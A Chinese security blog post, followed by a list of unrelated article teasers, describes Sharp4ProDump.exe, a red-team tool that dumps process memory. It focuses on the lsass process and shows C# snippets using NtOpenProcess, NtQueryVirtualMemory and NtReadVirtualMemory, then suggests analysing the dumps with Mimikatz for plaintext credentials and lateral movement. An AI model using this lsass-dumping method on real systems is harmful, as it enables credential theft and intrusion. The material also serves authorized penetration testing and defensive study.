.NET 一款用于转储指定进程内存的工具
01阅读须知
此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面
02基本介绍
在红队活动中,转储进程的内存可以有效地提取用户凭据,特别是像 lsass 这样的关键进程,因为该进程负责处理身份验证和安全令牌。Sharp4ProDump.exe 就是这样一款内网渗透的工具,能够针对指定进程进行内存转储。
03使用方法
Sharp4ProDump.exe 允许用户为指定进程生成内存转储文件。其基本使用方式如下所示。
Sharp4ProDump.exe ProcessName [FILE]
参数FILE为可选的输出文件名,默认为包含所有内存块的文件,其实在转储时也为每个内存区域生成一个文件。需要注意的一点,转储lsass进程需要以管理员身份执行, 而对于用户启动的进程,无需管理员权限,方便红队灵活选择目标。
比如,转储notepad.exe记事本进程时就无需管理员权限,普通权限下的cmd即可运行成功,如下图所示。
04原理解析
默认情况下首先获取 lsass 进程的 ID,当然也可以指定为其他进程的名称,然后通过调用 NtOpenProcess 函数打开该进程,具体代码如下所示。
Process[] processesByName = Process.GetProcessesByName("lsass");
if (processesByName.Length == 0)
{Console.WriteLine("[-] Process not found.");Environment.Exit(0);
}
int id = processesByName[0].Id;
IntPtr zero = IntPtr.Zero;
Win32.NtOpenProcess(ref zero, 1040U, ref object_ATTRIBUTES, ref client_ID);
随后,使用 NtQueryVirtualMemory 函数查询进程的内存区域,并筛选出可读的内存块。对于每个合适的内存区域,工具调用 NtReadVirtualMemory 读取内存数据并写入到文件中。
while (Win32.NtQueryVirtualMemory(zero, intPtr, 0U, out memory_BASIC_INFORMATION, 48U, out num2) == 0)
{if (memory_BASIC_INFORMATION.Protect == 4 && memory_BASIC_INFORMATION.State == 4096){byte[] array2 = new byte[(int)memory_BASIC_INFORMATION.RegionSize];Win32.NtReadVirtualMemory(zero, memory_BASIC_INFORMATION.BaseAddress, array2, (int)memory_BASIC_INFORMATION.RegionSize, out intPtr2);Program.WriteToFile(array2, (int)memory_BASIC_INFORMATION.RegionSize, filename);}
}
转储完成后,工具将每个内存区域的内容写入不同的 .dmp 文件,并生成一个包含所有内存块的汇总文件。
string filename2 = text + "_" + id.ToString() + "_allinone.dmp";
if (args.Length > 1)
{filename2 = args[1];
}
Program.WriteToFile(array, array.Length, filename2);
一旦完成转储,红队可以利用一些工具(如 Mimikatz)分析这些内存转储文件,提取明文凭据和其他敏感信息。通过这种方式,红队可以实现横向移动、提权或其他后续攻击。
综上,Sharp4ProDump.exe 是红队在渗透测试中一个不可或缺的工具,通过高效地转储进程内存,获取关键凭据,为进一步的攻击奠定基础。
05.NET安全知识库
星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题。
星球文化20+个专题栏目涵盖了点、线、面、体等知识面!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。
相关文章:
.NET 一款用于转储指定进程内存的工具
01阅读须知 此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失…...
Splunk 修补关键漏洞,包括远程代码执行漏洞
领先的数据分析和安全监控平台 Splunk 发布了一系列安全更新,以解决 Splunk Enterprise 和 Splunk Cloud Platform 中的多个漏洞。这些漏洞的严重程度不一,有些可实现远程代码执行(RCE),有些则允许低权限用户访问敏感信…...
搭建一个vue3+vite框架
可以使用以下两种搭建方式 通过create-vue搭建vue3 项目(建议使用) create-vue create-vue 是 Vue.js 官方推荐的用于快速启动 Vite 驱动的 Vue 项目的脚手架工具。它简化了创建新 Vue 项目的过程,提供了预配置的项目结构,并集…...
【含文档】基于Springboot+Vue的公交管理系统(含源码+数据库+lw)
1.开发环境 开发系统:Windows10/11 架构模式:MVC/前后端分离 JDK版本: Java JDK1.8 开发工具:IDEA 数据库版本: mysql5.7或8.0 数据库可视化工具: navicat 服务器: SpringBoot自带 apache tomcat 主要技术: Java,Springboot,mybatis,mysql,vue 2.视频演示地址 3.功能 系统定…...
自闭症儿童能否适应学校生活:提供专业辅助,助力顺利融入
自闭症,这一复杂的神经发育障碍,往往让许多家庭在孩子的教育问题上倍感焦虑。面对即将步入学校生活的自闭症儿童,家长们不禁要问:他们能否适应学校生活?如何帮助他们顺利融入?幸运的是,随着医疗…...
MQTTnet.Server同时支持mqtt及websocket协议
Net6后写法 Net6前写法 Program.cs using Microsoft.AspNetCore.Hosting; using Microsoft.Extensions.Configuration; using Microsoft.Extensions.Hosting; using MQTTnet.AspNetCore; using System; using System.IO;namespace MQTTnet.Server {public class Program{publ…...
【数据结构】二叉树(一)遍历
导言 前面以及有了堆的基础,现在来学习二叉树。二叉树的学习和前面的数据结构很不一样,前面我们主要学习用数据结构储存数据,以及实际手搓数据结构的增删查改;而学习二叉树主要是为我们以后学搜索二叉树以及后面的AVL树等数据结构…...
【C++ 贪心】1616. 分割两个字符串得到回文串|1868
本文涉及知识点 C贪心 LeetCode1616. 分割两个字符串得到回文串 给你两个字符串 a 和 b ,它们长度相同。请你选择一个下标,将两个字符串都在 相同的下标 分割开。由 a 可以得到两个字符串: aprefix 和 asuffix ,满足 a aprefi…...
识别秒拨风险的具体方法及策略
秒拨技术是利用家用宽带拨号上网(PPPoE)的特性,通过频繁断线重连来获取新的IP地址,从而构建代理服务或进行其他网络活动。这种技术使得IP地址的切换频率极高,加大了识别和追踪的难度。因此,首先需要对秒拨技…...
[Python]如何在Ubuntu中建置python venv虛擬環境,並安裝TensorFlow和OpenCV函式庫?
為了在樹莓派上實現物件影像辨識功能,同時不影響樹莓派原來的python運行環境,選擇建置python虛擬環境[Note1]是一個好方式,其可避免版本衝突和不同運行環境的問題。另外,一併在該虛擬環境中安裝TensorFlow[Note2]和OpenCV[Note3]等…...
.End(xlUp).Row和Cells(Rows.Count, 1).End(xlUp)有什么区别)
Excel:Cells(Rows.Count, 1).End(xlUp).Row和Cells(Rows.Count, 1).End(xlUp)有什么区别
Cells(Rows.Count, 1).End(xlUp).Row 和 Cells(Rows.Count, 1).End(xlUp) 是 VBA 中用于定位 Excel 工作表中单元格的两种不同用法。以下是它们的区别: 1. Cells(Rows.Count, 1).End(xlUp).Row 功能: 这个表达式返回的是一个行号(Long 类型)…...
E. Count Paths
题目 题解: #include <bits/stdc.h>#define forn(i, n) for (int i 0; i < int(n); i)using namespace std;int n; vector<int> a; vector<vector<int>> g;long long ans; vector<map<int, int>> cnt;void dfs(int v, int …...
之良创关系(Well-Founded Relation))
集合论(ZFC)之良创关系(Well-Founded Relation)
定义在集合S中的一个二元关系(Binary Relation)记,<,有(S,<)。如果对于集合S的任意非空子集,都存在关系(<)下的最小元素,那么该关系&…...
centos 安装达梦数据库
一、环境准备 1.1、确认操作系统的版本和数据库的版本是否一致 ## 查看系统版本:cat /etc/redhat-release CentOS Linux release 7.5.1804 (Core)1.2、关闭防火墙和Selinux # 查看selinux是不是disabled / enforce cat /etc/selinux/config## 查看防火墙状态 fir…...
《Windows PE》6.4.1 无 DLL远程注入
本节我们将演示如何实现远程注入的两种不同方案。方案一选择远程注入代码和数据,方案二选择远程注入DLL。 本节必须掌握的知识点: 无DLL远程注入 远程注入DLL 6.4.1 无DLL远程注入 实验四十五:无DLL远程注入(C语言实现…...
浙大数据结构:10-排序6 Sort with Swap(0, i)
这道题用了数环的思想,MOOC最后视频中也有相关介绍,思想还是很巧妙的 机翻 1、思想 2、 主函数 先把数据存进来,然后从头开始遍历,如果该位置数不对则anwser,然后遍历整个环,一直加anwser,如…...
基于vue框架的的爱心捐赠物资信息系统85gsu(程序+源码+数据库+调试部署+开发环境)系统界面在最后面。
系统程序文件列表 项目功能:用户,爱心项目,捐赠类型,捐赠,积分兑换,兑换,捐赠名录,捐赠去向 开题报告内容 基于Vue框架的爱心捐赠物资信息系统开题报告 一、研究背景与意义 随着社会的发展和人们生活水平的提高,爱心捐赠活动逐渐成为连接捐赠者与受赠…...
AI对抗AI:如何应对自动化攻击新时代?
在当今这个生成式AI迅猛发展的时代,自动化攻击的威胁日益加剧。 在人工智能浪潮下,如何利用AI对抗AI,从而实现全方位的网络安全防护? 一、AI浪潮下,自动化攻击加剧 AI技术的发展既带来了前所未有的挑战,也…...
【微服务】微服务注册:构建灵活的服务管理机制
目录 引言一、什么是微服务注册?1.1 服务注册中心的作用1.2 服务注册中心的工作原理1.3 示意图 二、常见的微服务注册中心2.1 各注册中心详细对比 三、微服务注册的实现方式3.1 Spring Cloud Netflix Eureka3.2 Consul3.3 Zookeeper3.4 etcd 四、微服务注册的注意事…...
AsyncTask的工作原理和缺陷
AsyncTask的工作原理及其缺陷 AsyncTask是Android平台提供的一个轻量级的异步任务类,它允许开发者在后台线程中执行耗时操作,并在操作完成后将结果回调到主线程以更新UI。AsyncTask内部封装了线程池和Handler机制,简化了多线程编程的复杂性。…...
Floyd算法)
算法基础篇(11)Floyd算法
Floyd算法本质是动态规划,用来求任意两点之间的最短路,也称为插点法。通过不断在两点之间加入新的点来更新最短路。1、状态表示:f[k][i][j]表示:仅仅经过1~k这些点,结点i走到结点j的最短路径的长度。2、状态转移方程&a…...
[特殊字符]空间智能目标追踪系统:从“看视频”到“掌控空间”的技术跃迁——多模态识别 × 空间建模 × 轨迹预测,让视频系统具备“感知与决策能力”[特殊字符] 视频系统的终极形态,不是记录世
🚨空间智能目标追踪系统:从“看视频”到“掌控空间”的技术跃迁——多模态识别 空间建模 轨迹预测,让视频系统具备“感知与决策能力”💥 视频系统的终极形态,不是记录世界,而是理解世界。一、系统定位&am…...
SELF-REFINE in Action: Enhancing LLM Outputs Through Iterative Self-Feedback
1. 什么是SELF-REFINE?为什么LLM需要自我迭代? 想象一下你正在写一封重要邮件。第一稿可能直接了当但缺乏礼貌,经过几次修改后,措辞变得更加得体。这就是人类通过自我反馈不断完善的过程。现在,大型语言模型࿰…...
SaaS级AI员工系统源码商用版,多租户+计费系统+API分销,一套源码搞定
温馨提示:文末有资源获取方式最近“龙虾AI”的热度居高不下,到处都在讨论如何“养龙虾”。但观察下来发现,这类应用对普通用户而言技术门槛还是偏高,部署、配置、调试都需要专人跟进,最终往往沦为摆设。源码获取方式在…...
AI短剧的风口来了!无需编程,全程技术支持,助你快速贴牌部署私有化系统
🔥 AI短剧爆火,但你还在因为“没有技术团队”而错失风口? 2024-2025年,AI短剧无疑是内容创业最大的黑马。从AI换脸、AI配音到一键生成剧本,市场的需求呈指数级爆发。 然而,对于大多数手握流量渠道、有客户…...
为ROS开发准备:在拯救者Y7000上搭建Win11+Ubuntu22.04双系统全流程
拯救者Y7000 Win11与Ubuntu22.04双系统配置:ROS开发环境搭建实战手册 在机器人操作系统(ROS)开发领域,稳定的Linux环境是必不可少的基石。对于使用拯救者Y7000这类高性能笔记本的开发者而言,如何在保留Windows11系统的…...
当Navicat密码遗忘时:开源解密工具如何重建数据库连接通路
当Navicat密码遗忘时:开源解密工具如何重建数据库连接通路 【免费下载链接】navicat_password_decrypt 忘记navicat密码时,此工具可以帮您查看密码 项目地址: https://gitcode.com/gh_mirrors/na/navicat_password_decrypt 数据库连接中断的三大痛点场景 场…...
附Matlab代码)
【图像加密解密】基于Halton 序列图像加密解密位置扰乱和像素扰乱(含相关性分析)附Matlab代码
作者简介:热爱科研的Matlab仿真开发者,擅长数据处理、建模仿真、程序设计、完整代码获取、论文复现及科研仿真关注我领取海量matlab电子书和数学建模资料 🍊个人信条:格物致知,完整Matlab代码获取及仿真咨询内容私信。ὒ…...
VHD/VHDX差分盘:Windows系统合并、回滚与定位
VHD/VHDX差分盘:Windows系统合并、回滚与定位VHD/VHDX 差分盘是 Windows 系统中一种高效的虚拟磁盘管理技术,尤其适用于需要频繁进行系统状态回滚、软件测试或虚拟机镜像管理的场景。通过仅存储与父盘的差异数据,差分盘能够显著节省存储空间&…...
)
别再纠结了!用SpringBoot实战告诉你,图片上传选FastDFS还是MinIO(附完整代码)
SpringBoot实战:FastDFS与MinIO文件存储方案深度对比与选型指南 在当今数据驱动的互联网应用中,文件存储系统如同数字世界的基础设施,支撑着从用户头像到高清视频的各种数据存取需求。作为Java开发者,当我们面对"选择困难症&…...